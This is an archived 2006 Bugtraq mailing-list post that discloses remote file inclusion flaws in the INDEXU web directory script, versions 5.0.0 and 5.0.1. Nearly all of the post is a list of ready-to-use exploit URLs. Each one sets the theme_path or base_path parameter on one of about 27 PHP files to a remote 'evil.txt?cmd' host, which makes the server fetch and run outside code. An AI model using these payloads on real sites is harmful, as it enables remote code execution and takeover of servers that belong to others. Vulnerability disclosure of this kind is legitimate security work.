lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060411011220.1246.qmail@securityfocus.com> Date: 11 Apr 2006 01:12:20 -0000 From: selfar2002@...mail.com To: bugtraq@...urityfocus.com Subject: INDEXU <= 5.0.1 (theme_path)and (base_path) Remote File Inclusion Exploit Application : Indexu version : 5.0.0 5.0.1 URL : http://www.nicecoder.com/ Vulnerable:# INDEXU <= 5.0.1 (theme_path)and (base_path) Remote File Inclusion Exploit Discovery by SnIpEr_SA in (theme_path) this file : exploit: http://example.com/indexu/index.php?theme_path=http://evil.txt?cmd http://example.com/indexu/become_editor.php?theme_path=http://evil.txt?cmd http://example.com/indexu/add.php?theme_path=http://evil.txt?cmd http://example.com/indexu/bad_link.php?theme_path=http://evil.txt http://example.com/indexu/browse.php?theme_path=http://evil.txt?cmd http://example.com/indexu/detail.php?theme_path=http://evil.txt?cmd http://example.com/indexu/fav.php?theme_path=http://evil.txt?cmd http://example.com/indexu/get_rated.php?theme_path=http://evil.txt?cmd http://example.com/indexu/login.php?theme_path=http://evil.txt?cmd http://example.com/indexu/mailing_list.php?theme_path=http://evil.txt?cmd http://example.com/indexu/new.php?theme_path=http://evil.txt?cmd http://example.com/indexu/modify.php?theme_path=http://evil.txt?cmd http://example.com/indexu/pick.php?theme_path=http://evil.txt?cmd http://example.com/indexu/power_search.php?theme_path=http://evil.txt?cmd http://example.com/indexu/rating.php?theme_path=http://evil.txt?cmd http://example.com/indexu/rating.php?theme_path=http://evil.txt?cmd?cmd http://example.com/indexu/register.php?theme_path=http://evil.txt?cmd?cmd http://example.com/indexu/review.php?theme_path=http://evil.txt?cmd?cmd http://example.com/indexu/rss.php?theme_path=http://evil.txt?cmd?cmd http://example.com/indexu/search.php?theme_path=http://evil.txt?cmd?cmd http://example.com/indexu/send_pwd.php?theme_path=http://evil.txt?cmd?cmd http://example.com/indexu/sendmail.php?theme_path=http://evil.txt?cmd?cmd http://example.com/indexu/tell_friend.php?theme_path=http://evil.txt?cmd?cmd http://example.com/indexu/top_rated.php?theme_path=http://evil.txt?cmd?cmd http://example.com/indexu/user_detail.php?theme_path=http://evil.txt?cmd?cmd http://example.com/indexu/user_search.php?theme_path=http://evil.txt?cmd?cmd --------------------------- in (base_path) in this file: invoice.php expliot: http://example.com/indexu/invoice.php?base_path=http://evil.txt?cmd?cmd ------------------- www.3asfh.com www.lezr.com <<<< Discovered By SnIpEr_SA